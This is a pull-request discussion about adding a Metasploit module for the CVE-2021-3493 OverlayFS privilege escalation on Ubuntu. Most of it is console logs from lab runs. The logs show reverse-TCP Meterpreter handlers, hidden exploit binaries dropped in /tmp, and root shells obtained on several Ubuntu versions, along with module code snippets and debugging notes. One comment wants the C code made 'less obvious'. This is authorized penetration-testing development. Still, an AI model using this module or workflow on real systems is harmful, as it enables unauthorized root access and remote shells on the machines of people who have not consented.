Add cve-2021-3493 module

[bwatters-r7]

This adds a module for the cve-2021-3493 overlay fs local privilege escalation for Ubuntu versions 14.04 - 20.10.

• Start msfconsole
• get a session with standard privilege
• use exploit/linux/local/cve_2021_3493_overlayfs
• set session <session>
• set COMPILE False
• run
• be root
• exit
• set COMPILE True
• run
• be root again

I'm leaving this as a draft because currently it:

1. Only uses the precompiled binary
2. Has crap for a check method
3. Has no documentation
   (Added) 4. The C code needs some work to make it less obvious

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 exploit(multi/handler) > set lport 4567
lport => 4567
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.197:4567 
[*] Sending stage (3012548 bytes) to 192.168.134.116
[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.134.116:60796 ) at 2021-11-03 13:41:36 -0500

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > show options

Module options (exploit/linux/local/cve_2021_3493_overlayfs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.M2OwFGor' (17880 bytes) ...
[*] Writing '/tmp/.tjEwB' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.134.116
[+] Deleted /tmp/.M2OwFGor
[+] Deleted /tmp/.tjEwB
[*] Meterpreter session 2 opened (192.168.135.197:4444 -> 192.168.134.116:55986 ) at 2021-11-03 13:42:13 -0500

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit

[bwatters-r7]

OK, so after the changes, I tested on a couple platforms. We might need to do some finer work with minor versions on the tail ends of vulnerability. In theory, the 20.04 should be vulnerable, but my updated dev VM is not, and one of the 16.04 VMs should have been vulnerable, but was not. I think it is likely less of an issue because if the VM was not vulnerable and it ran it anyway, you just get a shell back with the same privileges you had before. No crash or explosions. The method of controlling the directories created during the exploit is somewhat unorthodox, but it works. Taking this out of draft once I get the documentation done.

Ubuntu 18.04

[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.134.116:45910 ) at 2021-11-09 10:37:18 -0600

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > show options

Module options (exploit/linux/local/cve_2021_3493_overlayfs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set COMPILE True 
COMPILE => True
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.c2sqf
[*] /tmp/.c2sqf created
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Trying to write file
[*] Trying to compile file
[*] Done
[*] Writing '/tmp/.c2sqf/.x7YzB' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.c2sqf/.DWmV0X2 /tmp/.c2sqf/.x7YzB /tmp/.c2sqf x0T5WyJtW
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.134.116
[+] Deleted /tmp/.c2sqf/.DWmV0X2
[*] Meterpreter session 2 opened (192.168.135.197:4444 -> 192.168.134.116:55098 ) at 2021-11-09 10:38:00 -0600
[*] 

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.134.116 - Meterpreter session 2 closed.  Reason: Died
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set COMPILE False 
COMPILE => False
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.MH3N0Af
[*] /tmp/.MH3N0Af created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.MH3N0Af/.5lGtywsO' (17840 bytes) ...
[*] Writing '/tmp/.MH3N0Af/.sn3gFrmRh' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.MH3N0Af/.5lGtywsO /tmp/.MH3N0Af/.sn3gFrmRh /tmp/.MH3N0Af ZfBdcy9L7
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.134.116
[+] Deleted /tmp/.MH3N0Af/.5lGtywsO
[*] Meterpreter session 3 opened (192.168.135.197:4444 -> 192.168.134.116:55102 ) at 2021-11-09 10:38:31 -0600
[*] 

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.134.116 - Meterpreter session 3 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > 

Fedora 31

msf6 payload(linux/x64/meterpreter/reverse_tcp) > 
[*] Sending stage (3012548 bytes) to 192.168.134.127
[*] Meterpreter session 5 opened (192.168.135.197:4567 -> 192.168.134.127:39578 ) at 2021-11-09 11:27:03 -0600

msf6 payload(linux/x64/meterpreter/reverse_tcp) > session -i 5
[-] Unknown command: session
msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 31 (Linux 5.3.7-301.fc31.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 5...
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 5
session => 5
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > check
[*] The target is not exploitable. Target is not Ubuntu!

Ubuntu 16.04

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > sysinfo
Computer     : ubuntu16.04.1x64
OS           : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 6...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 6
session => 6
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.4.0", "31", "generic"]
[*] major_version: 4.4.0
[*] minor_version: 31
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.EQYLbHV8
[*] /tmp/.EQYLbHV8 created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.EQYLbHV8/.zzWxj' (17840 bytes) ...
[*] Writing '/tmp/.EQYLbHV8/.OfMkFz' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.EQYLbHV8/.zzWxj /tmp/.EQYLbHV8/.OfMkFz /tmp/.EQYLbHV8 Sz8cE1C4
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.132.148
[+] Deleted /tmp/.EQYLbHV8/.zzWxj
[*] Meterpreter session 7 opened (192.168.135.197:4444 -> 192.168.132.148:53904 ) at 2021-11-09 11:31:14 -0600
[*] .zzWxj: setxattr /tmp/.EQYLbHV8/mz8cE1C4/Mz8cE1C4: Operation not permitted

meterpreter > getuid
Server username: msfuser

Ubuntu 20.04

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > 
[*] Sending stage (3012548 bytes) to 192.168.132.138
[*] Meterpreter session 9 opened (192.168.135.197:4567 -> 192.168.132.138:47988 ) at 2021-11-09 11:34:44 -0600

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i 9
[*] Starting interaction with 9...

meterpreter > sysinfo
Computer     : ubuntu-20.04.0
OS           : Ubuntu 20.04 (Linux 5.4.0-26-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 9...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 9
session => 9
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["5.4.0", "26", "generic"]
[*] major_version: 5.4.0
[*] minor_version: 26
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.wH0xRHji
[*] /tmp/.wH0xRHji created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.wH0xRHji/.PsJzzn' (17840 bytes) ...
[*] Writing '/tmp/.wH0xRHji/.Doeg4dSW1G' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.wH0xRHji/.PsJzzn /tmp/.wH0xRHji/.Doeg4dSW1G /tmp/.wH0xRHji 6PFbO1d
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.132.138
[+] Deleted /tmp/.wH0xRHji/.PsJzzn
[*] Meterpreter session 10 opened (192.168.135.197:4444 -> 192.168.132.138:41814 ) at 2021-11-09 11:35:05 -0600
[*] 

meterpreter > getuid
Server username: root

Ubuntu 20.04.2

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > 
[*] Sending stage (3012548 bytes) to 192.168.132.172
[*] Meterpreter session 11 opened (192.168.135.197:4567 -> 192.168.132.172:57574 ) at 2021-11-09 11:44:00 -0600

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i -1
[*] Starting interaction with 11...

meterpreter > sysinfo
Computer     : 192.168.132.172
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 11...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 11
session => 11
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["5.8.0", "41", "generic"]
[*] major_version: 5.8.0
[*] minor_version: 41
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.0rD2H3uA
[*] /tmp/.0rD2H3uA created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.0rD2H3uA/.9zORT3' (17840 bytes) ...
[*] Writing '/tmp/.0rD2H3uA/.YQuFXL' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.0rD2H3uA/.9zORT3 /tmp/.0rD2H3uA/.YQuFXL /tmp/.0rD2H3uA p7lOENBX
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.132.172
[+] Deleted /tmp/.0rD2H3uA/.9zORT3
[*] Meterpreter session 12 opened (192.168.135.197:4444 -> 192.168.132.172:40896 ) at 2021-11-09 11:44:25 -0600
[*] 

meterpreter > sysinfo
Computer     : 192.168.132.172
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

[bwatters-r7]

Let's hold off momentarily and see if this will work with other architectures like ARM and x86

[dwelch-r7]

Couple quick notes from testing today (going to hold off on further testing until we see if it works with other architectures)

I ran into the issue you mentioned running into on Ubuntu 20.04 where it said it was vulnerable but came back with a new session with the same privileges as the previous session

When testing out on Ubuntu 18.04 with a python meterpreter session I ran into this:

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 172.28.128.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. System architecture  is not supported "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.

I assumed this exploit should work with python and other non-native meterpreters

I went and overrode the check by setting ForceExploit to true and ran into a different issue which may be unrelated and instead a problem with my environment but I'm not sure

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set FOrceExploit true 
FOrceExploit => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 172.28.128.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. System architecture  is not supported ForceExploit is enabled, proceeding with exploitation.
[-] Exploit aborted due to failure: bad-config: /tmp is not writable
[*] Exploit completed, but no session was created.

[timwr]

fyi if you expose a vulnerable Ubuntu installation to the internet it will automagically grab the patch for this (I think it's an option under Software and Updates > Updates > When there are security updates : automatically download and install automatically).

[bwatters-r7]

The curse of infosec research: It's a good thing when people make your life miserable.....

[bwatters-r7]

OK.... First off, it does work right out of the box for ARM64, but I did find that installing build-essential seemed to patch the bug. I had to get an arm VM running, then install build-essential, then use the pre-compiled binary on the exact same VM image I was using before, but that had never connected to the internet.
Specifically, I was using the cloud image I found here: http://cloud-images-archive.ubuntu.com/releases/bionic/release-20210129/ubuntu-18.04-server-cloudimg-arm64.img on a Quemu VM running in VMM. It worked pretty well and if you want to recreate it, I'll throw the steps in the end.
Edit: I got segfaults with staged meterpreter payloads as a non-root user on aarch64 Ubuntu, but a stageless payload worked fine.

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i 13
[*] Starting interaction with 13...

meterpreter > sysinfo
Computer     : 192.168.122.36
OS           : Ubuntu 18.04 (Linux 4.15.0-135-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 13...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > show options

Module options (exploit/linux/local/cve_2021_3493_overlayfs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  False            yes       Compile on target (Accepted: Auto, True, False)
   SESSION  13               yes       The session to run this module on


Payload options (linux/aarch64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  7548             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 10.5.135.101:7548 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.15.0", "135", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 135
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.5NrNqi
[*] /tmp/.5NrNqi created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.5NrNqi/.7MJJcT' (14288 bytes) ...
[*] Writing '/tmp/.5NrNqi/.guGGbZoz' (1108192 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.5NrNqi/.7MJJcT /tmp/.5NrNqi/.guGGbZoz /tmp/.5NrNqi 0XYKs8I44
[+] Deleted /tmp/.5NrNqi/.7MJJcT
[*] Meterpreter session 15 opened (10.5.135.101:7548 -> 10.5.132.107:56678 ) at 2021-11-18 13:03:20 -0600
[*] 

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.122.36
OS           : Ubuntu 18.04 (Linux 4.15.0-135-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > 

To do this, I installed Virtual machine manager and Qemu, then downloaded the image above.
I ran this command to change the username/password on the image before booting (You can do it after, too)
sudo virt-customize -a <imagename> --root-password password:<yourcrappypassword>
You might need to install something new to get that to run- I think I did, but I don't remember what it was.
Anyway, then go into the VMM and select 'New' machine

Import Disk (click the dropdown for Architecture options and select aarch64)

Select the proper image and identify it as Ubuntu 18.04

The rest is straightforward selecting cores and memory.

[bwatters-r7]

@dwelch-r7 that is odd with Python. Specifically, the line here:
[!] The target is not exploitable. System architecture is not supported ForceExploit is enabled, proceeding with exploitation.
You can see that there are two spaces between architecture and is because that's where the arch value gets printed (line ~62). That leads me to believe that there's no arch values returning....

After checking, that's the case. The module uses a call to kernel_hardware to retrieve the architecture, and it returns nothing:

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > check

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[*] The target appears to be vulnerable.
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > irb
[*] Starting IRB shell...
[*] You are in exploit/linux/local/cve_2021_3493_overlayfs

>> kernel_hardware
=> ""
>> 

That's super odd, as the method for kernel_hardware is just:

  #
  # Returns the kernel hardware
  #
  # @return [String]
  #
  def kernel_hardware
    uname('-m')
  end

OK.... I think this is a bug with python meterpreter. When I connect with an elf meterpreter I can run the check, and then use irb to see that we're properly pulling the kernel_hardware value:

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > check

[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[*] The target appears to be vulnerable.
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > irb
[*] Starting IRB shell...
[*] You are in exploit/linux/local/cve_2021_3493_overlayfs

>> kernel_hardware
=> "x86_64"
>> cmd_exec('uname')
=> "Linux"
>> cmd_exec('uname -a')
=> "Linux ubuntu-18041 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux"
>> cmd_exec('uname -m')
=> "x86_64"
>> exit

On a python session, I can't get any of that, and the cmd_exec fails...

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 16
session => 16
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > check

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] The target is not exploitable. System architecture  is not supported
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > irb
[*] Starting IRB shell...
[*] You are in exploit/linux/local/cve_2021_3493_overlayfs

>> kernel_hardware
=> ""
>> cmd_exec('uname')
=> ""
>> cmd_exec('uname -a')
=> ""
>> cmd_exec('uname -m')
=> ""
>> 

I'm blaming Python, personally.

[timwr]

@bwatters-r7 you might want to try rebase this on top of #15805 as it includes some fixes for python meterpreter cmd_exec

[bwatters-r7]

@timwr here I was about to write an issue in Payloads, too! Now, it is just going to be an issue in mettle (I hope)!

[bwatters-r7]

Rebasing no longer gives me an error, but also, it does not work....

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set autocheck true
autocheck => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 10.5.135.101:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.jytz04sBD
[*] /tmp/.jytz04sBD created
[*] Detected architecture: x86_64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.x64.elf on system...
[*] Writing '/tmp/.jytz04sBD/.IBnrB0' (17840 bytes) ...
[*] Writing '/tmp/.jytz04sBD/.cnk2Fwtx' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.jytz04sBD/.IBnrB0 /tmp/.jytz04sBD/.cnk2Fwtx /tmp/.jytz04sBD Zh8YkZJ2D
[*] 
[*] Exploit completed, but no session was created.

[bwatters-r7]

OK... so the TL;DR is that this works on the binary payload, but fails on python payloads:

    random_string = rand_text_alphanumeric(5..10)
    args = "#{payload_path} #{exploit_dir} #{random_string}"
    begin
      output = cmd_exec(exploit_path, args)

This works on both:

    random_string = rand_text_alphanumeric(5..10)
    cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir} #{random_string}"
    vprint_status("Running: #{cmd_string}")
    begin
      output = cmd_exec(cmd_string)

Looks like there is a mismatch with how cmd_exec works on python vs binary. I did not dig into the python meterpreter code, though. I'm just going to switch to the second example.
I also rebased and added a check to make sure the payload and target arch match.

[bwatters-r7]

FWIW, you can verify this behavior by getting a python meterpreter session and a binary meterpreter session, then running :
cmd_exec('ls -larth')
cmd_exec('ls', '-larth')
In theory, these should be the same, but they are not.

[dwelch-r7]

Got it working on a native meterpreter took a couple goes to find an actually vulnerable version though even though the check method told me all the ones I tried were vulnerable

Unfortunately even with your changes the python meterpreter isn't working for me 😬

Not sure what the deal is here

Also a minor point is that when you use the module the default payload is for arm which I think is probably not the most compatible default payload

[dwelch-r7]

Almost forgot, totally works with compiling on the Target too

[bwatters-r7]

@dwelch-r7 unfortunately, targeting is hard..... The bright side is that nothing happens on a machine that's been patched. Tim suggested they shadow patch when connected to the internet, and I think he's right.
I agree on the payload selection. I lost a bit of time yesterday because I mismatched the payloads a couple times, so I rage-yeeted in a check to make sure the payload/target arch matched, but in the light of morning, I should be able to just add a default payload to the target selection, which would be much smarter.

[bwatters-r7]

Also, checking on that failure on python.... it looks maybe like the cleanup happened before the launch? I'll look into that real quick, too.

[bwatters-r7]

Huh.... I swung and missed on this one.
Literally found the root cause and prepped for it, then it looks like I forgot to commit a change to the actual cmd_exec call. Fix for the payload and pythons incoming....

[bwatters-r7]

Also, I'll put this here- the python meterpreter is still failing, sort of:

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 10.5.135.101:6582 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["5.8.0", "41", "generic"]
[*] major_version: 5.8.0
[*] minor_version: 41
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.2xBcXkoS
[*] /tmp/.2xBcXkoS created
[*] Detected architecture: x86_64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.x64.elf on system...
[*] Writing '/tmp/.2xBcXkoS/.UqNSs' (17840 bytes) ...
[*] Writing '/tmp/.2xBcXkoS/.x3T5V2x5' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.2xBcXkoS/.UqNSs /tmp/.2xBcXkoS/.x3T5V2x5 /tmp/.2xBcXkoS 6ipS5bd
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.102
[+] Deleted /tmp/.2xBcXkoS/.UqNSs
[*] Meterpreter session 10 opened (10.5.135.101:6582 -> 10.5.132.102:39130 ) at 2021-12-02 07:49:46 -0600
[*] 
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted

It seems to hang on the remove if you're in a python session, but once you exit the new session, the rm finishes and cleans up.

[bwatters-r7]

Linux 20.04.02 With Binary Payload

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  1         meterpreter x64/linux  msfuser @ 10.5.132.102  10.5.135.101:5482 -> 10.5.132.102:45760  (10.5.132.102)

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > reload
[*] Reloading module...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Unprivileged user namespaces are permitted
[*] Version array: ["5.8.0", "41", "generic"]
[*] major_version: 5.8.0
[*] minor_version: 41
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.H8nM0H3ie
[*] /tmp/.H8nM0H3ie created
[*] Detected architecture: x86_64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.x64.elf on system...
[*] Writing '/tmp/.H8nM0H3ie/.ZFgkI' (17840 bytes) ...
[*] Writing '/tmp/.H8nM0H3ie/.EDNNcM' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.H8nM0H3ie/.ZFgkI /tmp/.H8nM0H3ie/.EDNNcM /tmp/.H8nM0H3ie Z0pVs2EPI
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.102
[+] Deleted /tmp/.H8nM0H3ie/.ZFgkI
[*] Meterpreter session 6 opened (10.5.135.101:4444 -> 10.5.132.102:58106 ) at 2021-12-02 09:34:47 -0600
[*] 

meterpreter > getuid
Server username: root

Linux 20.04 With Python Payload

msf6 payload(python/meterpreter/reverse_tcp) > sessions -l

Active sessions
===============

  Id  Name  Type                      Information                Connection
  --  ----  ----                      -----------                ----------
  7         meterpreter python/linux  msfuser @ ubuntu-20042x64  10.5.135.101:6525 -> 10.5.132.102:56584  (10.5.132.102)

msf6 payload(python/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 7
session => 7
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Unprivileged user namespaces are permitted
[*] Version array: ["5.8.0", "41", "generic"]
[*] major_version: 5.8.0
[*] minor_version: 41
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.raA6uMftVZ
[*] /tmp/.raA6uMftVZ created
[*] Detected architecture: x86_64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.x64.elf on system...
[*] Writing '/tmp/.raA6uMftVZ/.AXAd9qKt' (17840 bytes) ...
[*] Writing '/tmp/.raA6uMftVZ/.fEKlyT38zg' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.raA6uMftVZ/.AXAd9qKt /tmp/.raA6uMftVZ/.fEKlyT38zg /tmp/.raA6uMftVZ nDG0QFg1Dx
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.102
[+] Deleted /tmp/.raA6uMftVZ/.AXAd9qKt
[*] Meterpreter session 8 opened (10.5.135.101:4444 -> 10.5.132.102:58172 ) at 2021-12-02 09:44:16 -0600
[*] 
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.

^C[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i -1
